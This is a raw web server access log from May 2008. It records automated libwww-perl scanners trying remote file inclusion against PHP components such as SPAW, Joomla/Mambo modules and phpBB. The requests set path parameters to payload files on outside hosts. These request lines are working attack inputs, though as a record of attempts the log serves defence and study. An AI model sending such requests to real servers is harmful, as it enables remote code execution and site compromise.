91.197.230.150 - - [04/May/2008:13:09:12 -0700] "GET /logs/access_080302.log//trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:13:09:13 -0700] "GET /logs/access_080101.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:09:13 -0700] "GET /logs/access_080302.log//trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:13:09:13 -0700] "GET /logs/access_080101.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:09:14 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:09:16 -0700] "GET /logs/access_080302.log//trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:13:09:20 -0700] "GET /logs/access_071129.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:13:09:20 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:13:09:20 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:09:25 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:09:25 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:09:25 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:09:26 -0700] "GET /logs/access_080302.log//trans/trans.php?trans=eng&page=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:09:30 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:09:30 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:09:30 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:09:41 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:09:41 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:09:41 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:09:41 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:09:41 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:09:41 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.92.71.151 - - [04/May/2008:13:09:42 -0700] "GET /logs/access_071116.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.86.92.9 - - [04/May/2008:13:09:53 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.92.9 - - [04/May/2008:13:09:53 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:09:53 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:09:53 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.230.150 - - [04/May/2008:13:09:55 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:13:09:57 -0700] "GET /logs/access_080228.log/config.inc.php?path_escape=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:13:09:57 -0700] "GET /config.inc.php?path_escape=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:13:09:57 -0700] "GET /logs/access_080130.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:13:09:58 -0700] "GET /logs/config.inc.php?path_escape=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:13:10:00 -0700] "GET /logs//newspublish/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:13:10:01 -0700] "GET //newspublish/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.64.29 - - [04/May/2008:13:10:21 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.64.29 - - [04/May/2008:13:10:21 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.64.29 - - [04/May/2008:13:10:22 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:10:22 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.219.101.32 - - [04/May/2008:13:10:38 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.101.32 - - [04/May/2008:13:10:38 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:10:39 -0700] "GET /logs/access_071216.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:10:39 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:10:39 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:10:40 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:10:40 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:10:40 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:10:41 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:10:41 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:10:41 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:10:42 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:10:42 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:10:42 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:10:42 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:10:42 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:10:42 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:10:43 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:10:43 -0700] "GET /logs/access_080131.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:10:43 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:10:43 -0700] "GET /config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:13:10:43 -0700] "GET /logs/access_080130.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:10:43 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:10:43 -0700] "GET /logs/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.94.156 - - [04/May/2008:13:10:50 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.94.156 - - [04/May/2008:13:10:50 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:10:50 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:10:51 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:10:52 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:10:56 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [04/May/2008:13:10:56 -0700] "GET /logs/access_080119.log/config/isp.conf.php?_SESSION[docroot_path]=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:13:10:57 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:13:11:03 -0700] "GET /logs/access_080108.log/config.inc.php?path_escape=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:11:06 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:11:07 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:11:08 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:11:13 -0700] "GET /logs/access_071216.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:11:13 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:13:11:13 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:11:14 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:11:14 -0700] "GET /logs/access_071218.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:11:14 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:11:14 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:11:14 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:11:14 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:13:11:16 -0700] "GET /logs/access_080130.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:11:22 -0700] "GET /logs/access_071216.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:11:22 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:11:22 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.129.208.30 - - [04/May/2008:13:11:27 -0700] "GET /logs/access_080117.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:13:11:34 -0700] "GET /logs/access_080130.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:13:11:39 -0700] "GET /logs/access_080130.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:11:55 -0700] "GET /logs/access_071216.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:11:55 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:13:11:55 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.223.191 - - [04/May/2008:13:12:20 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:12:36 -0700] "GET /logs/access_071116.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:12:37 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:13:12:38 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.35.4.200 - - [04/May/2008:13:12:38 -0700] "GET /logs/access_080215.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:13:12:45 -0700] "GET /logs/access_071126.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:13:12:45 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:13:12:46 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:13:12:47 -0700] "GET /logs/access_080130.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.233.12.225 - - [04/May/2008:13:12:51 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
91.121.94.156 - - [04/May/2008:13:13:04 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://r0xshock.90megs.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
